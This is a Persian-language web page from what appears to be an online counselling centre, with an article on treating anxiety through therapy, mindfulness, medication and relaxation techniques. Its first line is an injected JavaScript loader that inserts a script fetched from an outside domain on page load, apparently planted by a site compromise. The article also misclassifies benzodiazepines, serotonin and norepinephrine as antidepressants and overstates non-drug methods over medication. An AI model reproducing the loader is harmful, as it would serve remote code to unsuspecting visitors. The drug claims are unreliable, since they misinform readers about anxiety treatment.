;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); درمان اضطراب چیست و چگونه متوقف می شود؟ | مرکز مشاوره آنلاین روان‌یاری
درمان استرس

درمان اضطراب چیست و چگونه متوقف می شود؟

میزان پیشرفت خواندن شما

فهرست مطالب

اضطراب می تواند از عوامل آزار دهنده زندگی روزمره هر فردی باشد. دلهره، ترس، استرس و… از دیگر کلماتی هستند که به منظور توصیف اضطراب به کار گرفته می شوند. این عارضه در وضعیت عادی و قابل کنترل نیاز به درمان جدی ندارد. درمان اضطراب زمانی حائز اهمیت می شود که فرد قادر به کنترل وضعیت پیش آمده نباشد.همه ما هر از گاهی نگران می شویم و می ترسیم. اما آن هایی که مضطرب هستند، با ترسی غیر واقعی رو به رو می شوند. طوری که ممکن است این ترس ها در نظر دیگران بسیار احمقانه و غیر منطقی به نظر برسند. ارتباط با این نگرانی ها می تواند سخت باشد.

ضرورت درمان اضطراب چیست؟

مسلماً تحمیل استرس و فشار روانی بر افراد می‌تواند منجر به مختل شدن کارهای روزمره یا پریشانی بیش از اندازه شود. در این حالت فرد قادر به تمرکز بر روی هیچ موضوعی نیست و کنترل امور مختلف را از دست می دهد. ضمن اینکه اضطراب شدید در نهایت علاوه بر اینکه تأثیرات روانی بسیاری به همراه دارد، می تواند بر وضعیت جسمانی فرد نیز تاثیر قابل توجهی داشته باشد و سلامت فرد را از بین ببرد.

چگونه اضطراب را درمان کنیم؟

درمان کردن اضطراب در حالت کلی پیروی دو روش زیر است:

  • اول اینکه فرد به کمک درمانگر و با کمک تکنیک های پیشنهاد شده در رویکردهای مختلف می‌آموزد که منشا اضطراب کجاست و چطور آن را کنترل کند
  • دوم اینکه فرد با استفاده از داروهای ضد افسردگی، خود را به شرایط نرمال زندگی بر می گرداند.

راههای درمان اضطراب شدید

اضطراب شدید نسبت به سایر استرس‌ ها و دلهره های روزمره مهم تر است. ضمن اینکه چنین اضطرابی اگر به موقع کنترل نشود، می‌تواند آسیب به مراتب بیشتری نیز به شما وارد کند.

پیدا کردن مشاور خوب

 اول اینکه به دنبال یک مشاور خوب باشید. اگر چه ممکن است بخشی از درمان دلهره شدید مربوط به داروهای مصرفی باشد اما بخش قابل توجه آن مربوط به انتخاب یک مشاور و درمانگر مناسب برای کنترل اضطراب شدید است. متاسفانه اغلب افرادی که درگیر پانیک یا به اصطلاح اضطراب شدید می شوند، دچار اختلال رفتاری نیز هستند.

اضطراب اساساً نشاندهندۀ وجود نگرانی در فرد است و در درمان متمرکز بر هیجان EFT بخش قابل توجهی از درمان ترس و اضطراب به ایجاد یک رابطۀ درمانی امن همچنین توانمند سازی «خود» و شناسایی و تفکیک احساساتی اختصاص داده می‌شود که فرد را نگران کرده یا می‌ترسانند.

ذهن آگاهی هم یکی از مواردی است که برای درمان دلهره مورد توجه قرار می گیرد. فردی که به شکل خودآگاه وضعیت ذهنی خود را تحت کنترل گرفته، مسلماً تحت تاثیر اضطراب و استرس قرار نمی گیرد. ذهن آگاهی هم می‌تواند به کمک درمانگر در جلسات انجام شود.

مصرف دارو برای درمان دلهره و اضطراب

روش دومی که برای کنترل ترس شدید مورد استفاده قرار می گیرد، مصرف داروهای ضد افسردگی مانند بنزودیازپین ها، فلوکستین، دولوکستین، سروتونین، سیتالوپرام، نوراپی نفرین و غیره می باشد. داروهای صنعتی می توانند مکمل خوبی برای بهبود وضعیت بیمار یا تاثیر بیشتر روش‌های رواندرمانی باشند اما به طور کلی مصرف این نوع داروها برای مدت طولانی پیشنهاد نمی شود. چرا که اغلب آن ها وابستگی شدید به همراه دارند.

  دروغگویی
مصرف دارو برای درمان دلهره و اضطراب

نفس عمیق بکشید

یکی از تکنیک های مهم مواجه با استرس شدید، تکنیک تنفس عمیق است. در چنین حالتی فرد به جای اینکه تحت تاثیر حملات غیر قابل کنترل پانیک قرار بگیرد، سعی بر تمرکز روی تنفس عمیق دارد. این موضوع وضعیت نرمال را به بدن شما باز می گرداند و طول حمله پانیک را کمتر می کند.

برای درمان ترس چشمان خود را ببندید

این تکنیک نیز به عنوان یک تکنیک آرامش بخش برای کنترل و درمان دلهره مدنظر قرار می گیرد. زمانی که چشمان خود را می بندید، بر روی موضوعاتی نظیر تنفس عمیق متمرکز شوید. بستن چشم ها می تواند در لحظه وقوع پانیک، شما را از محرک های مختلف بیرونی نجات دهد.

درمان دلهره

آرام سازی عضلات

آرام سازی عضلات نیز به عنوان یکی از مهمترین تکنیک های درمان اضطراب معرفی می شود. متاسفانه استرس بیش از اندازه باعث گرفتگی عضلات می شود. این مسئله می‌تواند زمینه برای ابتلا به بیماری‌های جسمی را نیز به وجود آورد. نکته قابل توجه دیگر اینکه بسیاری از افراد در هنگام بروز استرس، گرفتگی شدید عضلانی را تجربه می کنند. بنابراین شما در تکنیک‌های آرام‌سازی عضلات یاد می گیرید که عضلات خود را به شکل منبسط و شل حفظ کنید و از اسپاسم و انقباض آن ها جلوگیری نمایید. با این تکنیک استرس نیز کنترل می شود.

جمع بندی

درمان دلهره و اضطراب به کمک مجموعه ای از تکنیک های روان شناختی نظیر تنفس عمیق، تمرکز بر روی تصورات مثبت، بستن چشم ها، آرام سازی عضلات و… انجام می شود. این روش ها نسبت به داروها تاثیر به مراتب بیشتری دارند.

منبع: مرکز مشاوره روان‌یاری

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.